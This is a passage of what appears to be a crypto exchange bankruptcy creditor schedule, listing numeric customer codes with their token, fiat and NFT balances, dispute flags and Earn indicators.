| 07387483 | | AVAX[.05236473], BAT[20.49677803], BCH[.04555698], BRZ[7.60040847], BTC[.00868172], CUSDT[32], DAI[.88659887], DOGE[2698.57284858], ETH[.0837015], ETHW[.08267474], GRT[11.4250758], KSHIB[228.07951536], LINK[.77553329], MATIC[6.24300689], PAXG[.01118343], SHIB[19018.87394266], SOL[4.38477444], SUSHI[11.15915902], TRX[142.6590799], UNI[.00001149], USD[0.00], USDT[3.25731789], YFI[.00033313] | Yes | |
| 07387485 | | BAT[7.64076052], CUSDT[1], DOGE[410.80623191], TRX[124.05627248], USD[0.00] | Yes | |
| 07387487 | | USD[0.00] | | |
| 07387488 | | CUSDT[2], DOGE[222.362544], NFT (391200465796280933/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #71)[1], SHIB[236321.1873804], SOL[.07195085], USD[0.00] | Yes | |
| 07387491 | | CUSDT[1], DOGE[148.69311391], USD[0.00] | | |
| 07387500 | | DOGE[1496.24907036], USD[0.00] | | |
| 07387508 | | USD[30.20] | Yes | |
| 07387509 | | USD[0.00] | | |
| 07387513 | | DOGE[2], USD[0.00] | | |
| 07387514 | | CUSDT[2], DOGE[.91152449], ETH[.00043843], ETHW[.00043843], UNI[.03207674], USD[10.42] | | |
| 07387519 | | DOGE[2], ETH[.0000001], ETHW[.0000001], TRX[1], USD[0.00] | | |
| 07387520 | | TRX[182.96987821], USD[0.00] | Yes | |
| 07387524 | | CUSDT[4600.0534515], DAI[49.64098941], DOGE[1417.87423245], KSHIB[10919.30550735], LINK[2.82186953], SUSHI[22.61659256], TRX[1564.87121415], USD[0.00], USDT[99.39106869] | | |
| 07387527 | | BF_POINT[200], SOL[0], USD[0.00] | Yes | |
| 07387529 | | USD[0.00] | Yes | |
| 07387531 | | LINK[.00000001] | | |
| 07387541 | | USD[10.00] | | |
| 07387542 | | BTC[0.00026234], DOGE[2], SHIB[1], SOL[.00000176], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07387544 | | BAT[4.34551061], BRZ[3], CUSDT[3], DOGE[1.00002318], GRT[1.00312819], TRX[1.00069297], USD[0.00], USDT[3.25916264] | Yes | |
| 07387546 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07387550 | | GRT[4.29062268], USD[0.00] | | |
| 07387563 | | BTC[0], CUSDT[1], DOGE[4], TRX[1.000047], UNI[.00001823], USD[0.00] | | |
| 07387564 | | CUSDT[1], DOGE[140.85542627], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07387565 | Contingent, Disputed | CUSDT[1], GRT[0], SOL[0], TRX[1], USD[10.00] | | |
| 07387566 | | BTC[.00129253], CUSDT[808.49750429], DOGE[553.80023065], ETH[.01285968], ETHW[.01269552], USD[0.00], YFI[.00038292] | Yes | |
| 07387569 | | USD[10.00] | | |
| 07387570 | | AAVE[0.03052726], BAT[23.13668996], BCH[.02426886], BRZ[1], BTC[.00023269], CUSDT[2], DAI[12.07272658], DOGE[17.71003787], ETH[0], GRT[0], LINK[.86864609], LTC[.06875581], MATIC[2.60211812], MKR[0.00157807], PAXG[.0068766], SOL[0.00005416], SUSHI[.74214782], TRX[23, UNI[.50245801], USD[0.00], USDT[12.1294515], YFI[.00033714] | Yes | |
| 07387573 | | BTC[.00580013], CUSDT[4], DOGE[2916.08173766], ETH[.3748359], ETHW[.37467858], LTC[.12563628], TRX[1], USD[0.00] | Yes | |
| 07387580 | | USD[22.00] | | |
| 07387582 | | USD[10.00] | | |
| 07387583 | | SOL[108], USD[1.85] | | |
| 07387587 | | USD[0.00] | Yes | |
| 07387590 | | BRZ[3], CUSDT[3], SHIB[67309.92017784], TRX[3], USD[0.00], USDT[1] | | |
| 07387591 | | CUSDT[1], DOGE[4], TRX[1], USD[0.00] | | |
| 07387592 | | DOGE[1], ETH[.54358686], LINK[1.00897141], SHIB[26], SOL[9.43235143], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07387593 | | DOGE[1], SOL[0], TRX[4], USD[0.00] | Yes | |
| 07387594 | | USD[0.00], USDT[0] | | |
| 07387596 | | LTC[.04436704], USD[0.13] | | |
| 07387603 | | CUSDT[1], DOGE[899.38463942], USD[0.13] | | |
| 07387605 | | BTC[.00000009], DOGE[.17112985], ETH[.0000015], ETHW[.0000015], TRX[.01350254], USD[0.01] | Yes | |
| 07387612 | | SOL[.004], USD[0.00], USDT[2] | | |
| 07387613 | | DOGE[3.000548], SOL[2.2181713], SUSHI[2.28441976], TRX[614.64739195], USD[0.00] | Yes | |
| 07387618 | | USD[10.00] | | |
| 07387621 | | USD[10.00] | | |
| 07387626 | | BCH[.00443056], BTC[.00010745], CUSDT[2], DOGE[116.37754132], ETH[.00305337], ETHW[.00301233], SOL[1.16337113], USD[0.00] | Yes | |
| 07387627 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07387629 | | BRZ[2], CUSDT[2561.51347693], DOGE[7.29873539], LTC[.7474394], MATIC[52.2582773], TRX[1], USD[0.77] | Yes | |
| 07387632 | | DOGE[1042.72733734], GRT[3.39243424], USD[0.06], YFI[.00002347] | Yes | |
| 07387636 | | USD[10.00] | | |
| 07387637 | | BAT[0], CUSDT[2], DAI[0], DOGE[125.20423490], GRT[0], SOL[0], UNI[.00000001], USD[0.00] | Yes | |
| 07387638 | | DOGE[2], TRX[26788.82796119], USD[0.00] | Yes | |
| 07387639 | | SUSHI[.61579826] | | |
| 07387643 | | BAT[2.69972545], BF_POINT[5600], BRZ[1], BTC[.00000025], CUSDT[3], DOGE[3], ETH[.00001032], ETHW[1.13040604], GRT[1.00422925], SOL[0.00058336], TRX[5], USD[87.77] | Yes | |
| 07387645 | | AAVE[0], BTC[0], ETHW[4.0005711], MATIC[0.00000001], NFT [496977766751751554/The Hill by FTX #6877][1], SOL[0], USD[5.43], USDT[0] | | |
| 07387646 | | UNI[.51087225], USD[0.00] | Yes | |
| 07387648 | | DOGE[.0044], ETH[.0479297], ETHW[.0479297], LTC[.009924], UNI[1.098955], USD[0.63] | | |
| 07387652 | | CUSDT[7], DOGE[1], LINK[1.90333305], USD[0.00] | Yes | |
| 07387656 | | SUSHI[.52394122], USD[0.00] | Yes | |
| 07387664 | | SOL[.97625], USD[0.15] | | |
| 07387665 | | BTC[.00000008], GRT[1.00404471], TRX[2], USD[0.01] | Yes | |
| 07387666 | | CUSDT[.62], DOGE[7150.611], TRX[1276.437], USD[0.00], USDT[0.08783530] | | |
| 07387668 | | USD[5.13], USDT[0] | | |
| 07387669 | | USD[0.01] | | |
| 07387674 | | USD[0.02], USDT[0] | Yes | |
| 07387679 | | USD[0.00] | Yes | |
| 07387680 | | BRZ[1], USD[0.00] | | |
| 07387682 | | BRZ[2], CUSDT[6], TRX[2], USD[340.89] | Yes | |
| 07387690 | | BAT[1], DOGE[65.36186518], SOL[1.83142149], TRX[2], USD[0.73] | | |
| 07387695 | | USD[0.01] | | |
| 07387699 | | USD[10.00] | | |
| 07387702 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07387703 | | BAT[0], BTC[0], DAI[0], GRT[0], SOL[0], SUSHI[0], UNI[0], USD[1.03] | | |
| 07387704 | | DOGE[144.77916857], USD[0.00] | Yes | |
| 07387710 | | USD[0.88] | | |
| 07387717 | | CUSDT[4], DOGE[42.57168173], TRX[3], USD[0.00] | Yes | |
| 07387720 | | BRZ[1], CUSDT[3.00362433], DOGE[1372.38063333], TRX[3], USD[0.43] | | |
| 07387723 | | SOL[.72388651], USD[10.00] | | |
| 07387731 | | BRZ[1], LINK[.69934113], TRX[1], USD[0.00] | | |
| 07387734 | | USD[10.00] | | |
| 07387736 | | DOGE[160.9711386], USD[0.00] | Yes | |
| 07387738 | | BRZ[1], BTC[.01966005], DOGE[2], ETH[.01606441], SHIB[20], TRX[165.85793846], USD[-21.95] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07387740 | | BTC[0] | | |
| 07387743 | | BTC[.00004715], SOL[0] | | |
| 07387745 | | CUSDT[4], DOGE[1], ETH[.0124049], ETHW[.0124049], TRX[2], USD[107.46] | | |
| 07387748 | | LTC[1.07563756], TRX[1], USD[0.00] | Yes | |
| 07387751 | | USD[10.00] | | |
| 07387752 | | BAT[1], DOGE[2473.25706705], ETH[2.72049144], ETHW[2.72049144], GRT[1], USD[1250.00] | | |
| 07387754 | | BRZ[1], CUSDT[1], GRT[47.43922195], TRX[1182.6619254], USD[10.82] | Yes | |
| 07387759 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], SOL[0], USD[0.35], USDT[0] | Yes | |
| 07387762 | | USD[0.00] | | |
| 07387763 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MKR[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07387769 | | USD[1000.00] | | |
| 07387772 | | BRZ[1], BTC[.00133298], CUSDT[4], DOGE[204.54520738], USD[0.00] | Yes | |
| 07387779 | | ETH[.00612934], ETHW[.00604726], USD[0.00] | Yes | |
| 07387781 | | BTC[.00021793] | | |
| 07387784 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07387802 | | USD[10.00] | | |
| 07387810 | | DOGE[1], SHIB[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07387812 | | BTC[0.00031459], DOGE[1.0000139], USD[0.00] | | |
| 07387813 | Contingent, Disputed | BTC[.00004664], USD[1.81] | | |
| 07387814 | | SOL[0], USD[0.00] | Yes | |
| 07387816 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07387820 | | BAT[0], DOGE[0.99617629], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07387825 | | DOGE[1], USD[0.00] | Yes | |
| 07387826 | | BAT[0], BRZ[3], BTC[0], DOGE[6], ETH[0], ETHW[1.18298636], GRT[0], LINK[0], NFT [5033919442460077303/Solana Squirrel #242][1], SHIB[19], SOL[0], TRX[6], UNI[0], USD[5969.38], USDT[1.00018260] | Yes | |
| 07387831 | | BCH[.29778404], BRZ[1], BTC[.01869304], CUSDT[17], DOGE[457.42380535], ETH[.2451967], ETHW[.24500182], LTC[1.84535256], SHIB[246821.5276313], SOL[1.09208122], TRX[653.74496401], USD[0.08] | Yes | |
| 07387832 | | USD[0.00] | | |
| 07387836 | | TRX[178.67483663], USD[0.00] | | |
| 07387844 | | CUSDT[1], USD[0.00], USDT[10.29644600] | | |
| 07387845 | | USD[10.00] | | |
| 07387854 | | DOGE[0], TRX[2], USD[0.00] | | |
| 07387855 | | BCH[0], BF_POINT[100], BTC[0.00012686], DOGE[0], ETH[0.00056993], ETHW[0.00056993], GRT[0], LTC[0], SHIB[2.00002857], SOL[0], TRX[1], USD[102.25], USDT[0] | Yes | |
| 07387856 | | DOGE[1], USD[0.00] | | |
| 07387858 | | USD[0.00], YFI[.00012097] | | |
| 07387869 | | USD[0.00] | | |
| 07387874 | | USD[0.01] | Yes | |
| 07387876 | | BAT[0], BRZ[2], BTC[0], CUSDT[13], DOGE[0], ETH[0], GRT[0], LTC[0], PAXG[0], SHIB[2983329.28335985], SUSHI[0], TRX[0], USD[0.00], YFI[0] | Yes | |
| 07387878 | | ETH[.00000001], SUSHI[0], USD[0.00], USDT[0] | | |
| 07387885 | | BF_POINT[200], USD[0.00] | | |
| 07387887 | | ETH[.00006249], ETHW[0.00006249], NFT [336288686432688154/Bevel Boy #032 - The Bro][1], NFT [385671184382910225/Bevel Boy #045 - POTUS 45][1], USD[0.00] | Yes | |
| 07387889 | | BRZ[2], CUSDT[2], DOGE[12], TRX[5], USD[0.00], USDT[1] | | |
| 07387892 | | ETH[.55208966], ETHW[0.55208965] | | |
| 07387898 | | CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07387910 | | CUSDT[4], DOGE[1], USD[0.01] | | |
| 07387914 | | ETH[.0046105], ETHW[.00455578], USD[0.00] | Yes | |
| 07387924 | | USD[0.01] | | |
| 07387939 | | CUSDT[20.19624905], DOGE[.00001118], USD[0.01] | | |
| 07387959 | | BTC[0], UNI[.0328], USD[1.28] | | |
| 07387961 | | BAT[100.86961162], CUSDT[2], DOGE[589.50866604], LINK[2.19527905], TRX[1], USD[0.71], USDT[1.99004849] | | |
| 07387974 | | CUSDT[4], DOGE[1], TRX[2], USD[0.00], USDT[0] | | |
| 07387979 | | BRZ[1], DOGE[2], USD[0.00], USDT[1] | | |
| 07387984 | | TRX[.00002288], USD[0.00] | | |
| 07387990 | | BRZ[0], ETH[0], ETHW[0], SUSHI[0], TRX[7.5167685], USD[0.00] | | |
| 07388005 | | AAVE[0], AVAX[0], BAT[0], BCH[0], BRZ[0], BTC[0.00061428], DOGE[38219.08397203], ETH[0.00293596], GRT[0], LINK[0], LTC[0], MATIC[0], NFT [497288380730552422/Imola Ticket Stub #1409][1], NFT [519931479515300252/Entrance Voucher #2729][1], SOL[0], SUSHI[0], TRX[0], USD[600.19], USDT[0] | Yes | |
| 07388009 | | DOGE[.568], LTC[.00082788], SUSHI[.494], USD[1.76], USDT[4.534539] | | |
| 07388013 | | ETH[.00545709], ETHW[.00545709], NFT [383484934464543931/The Hill by FTX #4592][1], USD[0.00] | | |
| 07388017 | | DOGE[3136.52209067], USD[0.00] | Yes | |
| 07388022 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07388023 | | BAT[118.16218711], BCH[.07321529], BTC[.00113161], CUSDT[3], DOGE[898.97381722], ETH[.04240818], ETHW[.04188154], SHIB[1486669.54790712], TRX[1080.63056277], USD[0.00] | Yes | |
| 07388024 | | CUSDT[7], DOGE[2], ETH[.07558359], ETHW[.07464433], GRT[1156.08804145], MATIC[107.4745782], SHIB[2058983.3708205], TRX[2.16171225], USD[4.59] | Yes | |
| 07388027 | | BCH[.00935936], LTC[.02576844], USD[10.00] | | |
| 07388031 | | DOGE[.00002818], USD[3.93] | | |
| 07388035 | | AAVE[.0052], DOGE[.788], GRT[.416], LINK[.064], LTC[.00804], SOL[.0068], SUSHI[.028], USD[17.35], YFI[.00092] | | |
| 07388040 | | USD[0.00] | | |
| 07388041 | | USD[0.00] | | |
| 07388043 | | CUSDT[1], DOGE[8.09226329], USD[0.00] | Yes | |
| 07388046 | | BTC[0.00002249], ETH[0], ETHW[0], LINK[0], TRX[0], USD[0.00] | | |
| 07388047 | | BRZ[2], CUSDT[2], DOGE[0], ETH[0], ETHW[0], TRX[1], USD[0.00], USDT[1.05051262] | | |
| 07388054 | | BRZ[3], CUSDT[14], DOGE[5], TRX[2], USD[0.00] | Yes | |
| 07388058 | | USD[10.00] | | |
| 07388069 | | USD[0.03] | Yes | |
| 07388089 | | NFT (302051341091984985/Popsicles #7)[1], NFT (308512157222005615/Flower Burst #2)[1], NFT (310642870518474951/Cones #5)[1], NFT (312479422290227010/Cones #9)[1], NFT (343575394805190124/Flower Burst #15)[1], NFT (348598439176039634/Flower Burst)[1], NFT (362378810909506476/Flower Burst #7)[1], NFT (363252819729150742/Flower Burst #4)[1], NFT (364267610798462085/Flower Burst #14)[1], NFT (367917648570708619/Popsicles #12)[1], NFT (369297522397932453/Cones #4)[1], NFT (372529672019424320/Popsicles #9)[1], NFT (382162518166020681/Soft Serve #8)[1], NFT (382548031597162098/Soft Serve #13)[1], NFT (394942627119823831/Popsicles #5)[1], NFT (425660912715569192/Soft Serve #5)[1], NFT (443856080448722466/Soft Serve #10)[1], NFT (452926165540108277/Soft Serve #3)[1], NFT (459083992348902049/Flower Burst #11)[1], NFT (459447585280293853/Soft Serve #12)[1], NFT (463102149719507109/Soft Serve #6)[1], NFT (464351312636543578/Cones #10)[1], NFT (465029634795268738/Flower Burst #8)[1], NFT (476968935335979665/Flower Burst #9)[1], NFT (479879634702926552/Popsicles #8)[1], NFT (486349742011532189/Flower Burst #13)[1], NFT (494556504097351977/Flower Burst #5)[1], NFT (501346774226652569/Sandwich #2)[1], NFT (505278026306754082/Popsicles #11)[1], NFT (508670903107692941/Sandwich)[1], NFT (512679478323952045/Cones #6)[1], NFT (516802812592737774/Cones #6)[1], NFT (526043676557988728/Flower Burst #3)[1], NFT (529811531999720788/Popsicles #10)[1], NFT (537441594176985208/Soft Serve #1)[1], NFT (553233730353616102/Soft Serve #7)[1], NFT (556536374873247622/Sandwich #3)[1], NFT (561333715211692032/Flower Burst #10)[1], NFT (564901804236605024/Flower Burst #10)[1], NFT (566049960118574074/Popsicles #3)[1], NFT (573948781564875813/Flower Burst #6)[1], SOL[.00704712], USD[0.17] | | |
| 07388094 | | BAT[1.01361721], BRZ[4], CUSDT[16.2.93743423], ETHW[2.9362005], KSHIB[1478.45120408], SHIB[2], TRX[1091.57871167], USD[0.00], USDT[1.09903127] | Yes | |
| 07388097 | | BAT[1], CUSDT[4], GRT[1], USD[0.00], USDT[1] | | |
| 07388105 | Contingent, Disputed | BRZ[1], CUSDT[2], ETH[0], USD[0.00], USDT[1] | | |
| 07388106 | | DOGE[0], SHIB[1], USD[0.01], USDT[0] | Yes | |
| 07388107 | | CUSDT[8], MATIC[5.19853542], USD[0.00] | Yes | |
| 07388109 | | CUSDT[9], USD[0.00] | | |
| 07388115 | | USD[0.00] | Yes | |
| 07388116 | | BAT[0] | | |
| 07388117 | | BTC[0.00083790], CUSDT[2], DOGE[107.15721507], USD[0.00], USDT[0.04208625] | | |
| 07388129 | | CUSDT[7], DOGE[5361.07794708], TRX[5], USD[0.00] | Yes | |
| 07388143 | | BTC[0], USD[3.37], USDT[0] | | |
| 07388145 | | CUSDT[2], DOGE[146.78015714], USD[0.00] | | |
| 07388162 | | DOGE[514.54408775], ETH[.00000014], NFT (414503701271798447/Oasis Ocotillo Ferris Wheel #274)[1], NFT (491704476116135389/Coachella x FTX Weekend 2 #9853)[1], SHIB[1], USD[0.00] | Yes | |
| 07388174 | | USD[0.00], USDT[.00208625] | | |
| 07388178 | | USD[0.00] | | |
| 07388206 | | DOGE[2], USD[0.00] | | |
| 07388243 | | BTC[0], CUSDT[0], DOGE[268.62723440], USD[0.00], USDT[0.00000001] | Yes | |
| 07388274 | | BCH[.00000038], BTC[.00020041], USD[0.00] | | |
| 07388303 | | CUSDT[1], USD[0.00] | | |
| 07388313 | | CUSDT[1], DOGE[2], ETH[.00003945], ETHW[.00003945], USD[0.35], USDT[0.00000505] | | |
| 07388317 | | USD[0.00] | | |
| 07388339 | | USD[10.00] | | |
| 07388376 | | USD[0.00] | | |
| 07388382 | | USD[0.72] | | |
| 07388391 | | CUSDT[3], DOGE[1129.59548117], USD[0.00] | Yes | |
| 07388399 | | USD[10.00] | | |
| 07388414 | | BAT[204.29984682], BRZ[1], DOGE[1992.9983573], ETH[.25551624], ETHW[.25532285], LTC[.53247414], TRX[2093.55537269], UNI[5.45232485], USD[0.00], YFI[.00259686] | Yes | |
| 07388417 | | BAT[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], KSHIB[0], LTC[0], MATIC[0], NFT (324929518579300228/Sigma Shark #4782)[1], NFT (430540532995489341/Medical Cannabis #0017)[1], SHIB[218663.45642789], SOL[0.24204328], SUSHI[0], TRX[0], USD[0.00], YFI[0] | Yes | |
| 07388422 | | BCH[.088911], BTC[0.00085864], DOGE[1151], LINK[.0996], LTC[.1984], SUSHI[3.4785], TRX[.269], UNI[.999], USD[3.25], USDT[136.51923400] | | |
| 07388512 | | BTC[.02233031], DOGE[1], USD[10.00] | | |
| 07388529 | | NFT (531482777041979053/The Hill by FTX #2090)[1] | | |
| 07388546 | | DAI[.05653032] | | |
| 07388554 | | TRX[.910933], USDT[3.30677720] | | |
| 07388559 | | USD[0.00] | | |
| 07388598 | | SOL[.2], SUSHI[223.776], USD[12.66] | | |
| 07388604 | | BAT[1], BRZ[1], CUSDT[12.00153959], DOGE[48.87682463], GRT[1], TRX[2], UNI[.00584727], USD[0.00] | | |
| 07388639 | | BRZ[2], DOGE[5], ETH[.09553635], ETHW[.51066343], SHIB[11], TRX[3], USD[0.00] | Yes | |
| 07388659 | | TRX[.00001414], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07388676 | | DOGE[2], TRX[.000036], USD[0.00] | | |
| 07388683 | | DOGE[2.00570073], SUSHI[1.78775542], UNI[1.23653297], USD[0.00] | | |
| 07388708 | Contingent, Disputed | AAVE[.00000001], ETH[0], USD[0.33] | Yes | |
| 07388711 | | BTC[.00019182], USD[0.00] | | |
| 07388739 | | BTC[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07388770 | | USD[0.00], USDT[0] | | |
| 07388777 | | DOGE[27.37425689], USD[0.00] | | |
| 07388803 | | DAI[9.92621703], USD[0.00] | | |
| 07388840 | | BRZ[1], CUSDT[1], DOGE[5.12285439], TRX[2], USD[0.00] | Yes | |
| 07388845 | | USD[0.00] | | |
| 07388870 | | BRZ[4], BTC[.00783235], CUSDT[184.90458399], DOGE[1457.52135536], ETH[.10720146], ETHW[.10611447], LINK[1.96878658], SHIB[13143930.96321228], TRX[12.14292621], USD[0.00], USDT[0] | Yes | |
| 07388876 | | BRZ[3], CUSDT[3], DOGE[1.00608360], ETHW[.73732616], SHIB[4], USD[0.00] | Yes | |
| 07388882 | | BTC[0], ETHW[.46492], USD[21.13], USDT[0] | | |
| 07388886 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07388891 | | BRZ[4], BTC[.01490311], CUSDT[25], DOGE[4], ETH[.24299343], ETHW[.24279363], GRT[2.06802216], KSHIB[205.49056665], SHIB[221102.00716737], SOL[42.3923215], USD[0.00], USDT[1.10117383] | Yes | |
| 07388894 | | BRZ[1], CUSDT[4], DOGE[1287.29286655], GRT[0], TRX[0], USD[0.00] | Yes | |
| 07388914 | | BTC[.00000263], USD[0.00] | Yes | |
| 07388939 | | CUSDT[2.00003897], DOGE[3001.00002648], TRX[4341.34820984], USD[300.00], USDT[0.00000001] | | |
| 07388946 | | USD[29.68] | | |
| 07388957 | | USD[0.01], USDT[.00992] | | |
| 07388967 | | ETH[.00574328], ETHW[.00574328], USD[37.70] | | |
| 07388971 | | DOGE[21.59403428], GBP[1.34], USD[6.40] | | |
| 07388980 | | BTC[0], CUSDT[1], DOGE[1], USD[0.02] | | |
| 07388995 | | BTC[.00007898], CUSDT[3], DOGE[243.6416674], TRX[398.29884689], USD[0.23] | Yes | |
| 07388997 | | USD[3.21] | | |
| 07388999 | | USD[0.01] | | |
| 07389003 | | USD[0.01], USDT[0] | | |
| 07389030 | | DOGE[2.67899778], USD[80.00] | Yes | |
| 07389031 | | DOGE[314.50613425], USD[0.00] | | |
| 07389041 | | AAVE[4.32567], BTC[1.4868172], DOGE[.093], ETH[.00034395], ETHW[.00034395], GRT[894], MATIC[6263.92940604], SOL[187.11464], SUSHI[59.94], USD[17.87], USDT[0] | | |
| 07389043 | | CUSDT[1], DOGE[1], USD[0.01] | Yes | |
| 07389051 | | USD[0.00] | | |
| 07389056 | | BF_POINT[300] | | |
| 07389061 | | CUSDT[5], DOGE[352.8587299], USD[0.00] | Yes | |
| 07389064 | | CUSDT[2], USD[0.01] | | |
| 07389066 | | BAT[2.13136645], BRZ[1], CUSDT[2], DOGE[5.1341886], GRT[2.08456982], TRX[6.000004], USD[0.00], USDT[0] | Yes | |
| 07389069 | | BRZ[1], CUSDT[10], SHIB[879821.68396315], USD[0.00] | | |
| 07389075 | | ETH[.00137195], ETHW[.00137195], USD[0.00] | | |
| 07389078 | | USD[10.00] | | |
| 07389085 | | USD[10.00] | | |
| 07389092 | | USD[0.00] | | |
| 07389096 | | USD[0.00] | | |
| 07389103 | | USD[10.00] | | |
| 07389108 | | ETH[.00014835], ETHW[.00014835], LINK[.07827845], SOL[.0424], USD[21.44], USDT[0.00048535] | | |
| 07389111 | | CUSDT[2], TRX[1.00004419], USD[0.01] | | |
| 07389112 | | CUSDT[2], DOGE[2166.70370555], ETH[.02165634], ETHW[.02165634], TRX[2], USD[1.55] | | |
| 07389115 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01], USDT[1] | | |
| 07389116 | | BAT[0], BRZ[0], BTC[0], TRX[0], USD[0.00] | | |
| 07389118 | | BTC[0.00328564], SOL[1.67765993], USD[6707.19] | | |
| 07389120 | | USD[0.00] | | |
| 07389121 | | CUSDT[1], DOGE[127.79695062], USD[0.00] | | |
| 07389122 | | BAT[.00182777], BRZ[1], DOGE[6], GRT[.00066216], LINK[.0869052], TRX[2.83131154], USD[0.84] | | |
| 07389124 | | BTC[.05920177], ETH[.001], ETHW[.32], TRX[1], USD[266.12] | | |
| 07389130 | | SHIB[2], USD[0.01] | | |
| 07389133 | | USD[10.00] | | |
| 07389137 | | NFT (358126854452821555/Imola Ticket Stub #2336)[1], USD[0.01] | | |
| 07389140 | | CUSDT[2], USD[0.00] | | |
| 07389141 | | CUSDT[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07389146 | | AVAX[1.98154296], BRZ[1], DOGE[2], SHIB[18], SOL[3.98641788], TRX[2], USD[0.00], YFI[.0051668] | | |
| 07389148 | | DOGE[1], TRX[230.63310401], USD[0.00] | | |
| 07389149 | | DOGE[1.44759111], USD[0.00], USDT[0] | | |
| 07389164 | | BAT[0], BRZ[3], BTC[0], CUSDT[12], DOGE[927.00611380], ETH[0], GRT[0], LINK[0], LTC[0], SHIB[3], SOL[1.23167026], SUSHI[0], TRX[11], USD[0.00], USDT[0] | | |
| 07389168 | | BAT[1], BRZ[1], CUSDT[7], DOGE[1], USD[0.01], USDT[1] | | |
| 07389169 | | CUSDT[1], USD[0.00] | Yes | |
| 07389170 | | BTC[0], PAXG[.00000001], USD[21.80], USDT[0.00006172] | | |
| 07389171 | | BRZ[2], CUSDT[3], USD[0.00] | Yes | |
| 07389172 | | USD[100.00] | | |
| 07389174 | | SOL[.00000006], USD[0.00] | Yes | |
| 07389178 | | BRZ[6.6344144], CUSDT[7], DOGE[776.7728754], LTC[1.58971034], SHIB[3077036.9212594], TRX[1510.26501073], USD[0.00] | Yes | |
| 07389187 | | USD[0.00] | | |
| 07389192 | | BTC[0], DOGE[0], ETH[0.00000001], ETHW[0], GRT[0], LINK[0], MATIC[0], NFT (298591170480451340/Esteban Heath #3)[1], NFT (307422836670998704/Dosis #6)[1], NFT (314764368811199132/Dosis #2)[1], NFT (329613066952283683/Esteban Heath #10)[1], NFT (331189235660702241/Esteban Heath #4)[1], NFT (338128822801276189/Reem Kufi #6)[1], NFT (342960485978976270/Dosis Heath #1)[1], NFT (348431539864219866/Dosis Heath #2)[1], NFT (363991150247483767/Swanky & Moo Moo #9)[1], NFT (371965314176417755/Dosis #4)[1], NFT (382938057821676218/Esteban #10)[1], NFT (383765365945333156/Swanky & Moo Moo #3)[1], NFT (409207013175592288/Swanky & Moo Moo)[1], NFT (412039542862644700/Dosis #5)[1], NFT (414495333937911295/Reem Kufi #2)[1], NFT (424800496422122969/Swanky & Moo Moo #2)[1], NFT (428947342001562999/Swanky Heath #2)[1], NFT (434008947033167118/Dosis Heath #5)[1], NFT (439485073580558061/Esteban Heath #9)[1], NFT (442116893879702718/Esteban #3)[1], NFT (443105284580666164/Esteban Heath #1)[1], NFT (448750445706744066/Dosis #7)[1], NFT (450805459488510489/Esteban #6)[1], NFT (454972060786250566/Dosis Heath #6)[1], NFT (457372590308613635/Swanky & Moo Moo #8)[1], NFT (459308600048675362/Dosis #10)[1], NFT (462433098081871203/Dosis Heath #7)[1], NFT (468021914400620713/Dosis Heath #3)[1], NFT (469900288008140768/Dosis #3)[1], NFT (477812278052429770/Dosis Heath #9)[1], NFT (499446775844502428/Swanky & Moo Moo #7)[1], NFT (501092972008742699/Swanky & Moo Moo #2)[1], NFT (505537087925998081/Swanky & Moo Moo #10)[1], NFT (509158698129837431/Esteban Heath #6)[1], NFT (520222532980908096/Swanky & Moo Moo #5)[1], NFT (522708383634301439/Dosis Heath #10)[1], NFT (540923710574257216/Reem Kufi #8)[1], NFT (543862072452711868/Swanky Heath #3)[1], NFT (547597565988276165/Reem Kufi #9)[1], NFT (550851724611938334/Reem Kufi #10)[1], NFT (562096651455604772/Dosis Heath #1 #1)[1], SOL[0.00000001], SUSHI[0], TRX[0], USD[19.59], USDT[0.000000171] | | |
| 07389195 | | GRT[.6016] | | |
| 07389200 | | BTC[.000014], DAI[.0028], DOGE[.704], ETH[.35332], ETHW[.35332], LINK[4.3437], SOL[10.0956], SUSHI[5], USD[120.31], USDT[.00619472] | | |
| 07389206 | | BTC[0], ETH[.14013785], LINK[0], UNI[0], USD[133.19], USDT[0], YFI[0] | | |
| 07389211 | | USD[0.01] | | |
| 07389220 | | USD[10.00] | | |
| 07389227 | | USD[0.00] | | |
| 07389238 | | CUSDT[1], DOGE[0], USD[0.00], USDT[0] | | |
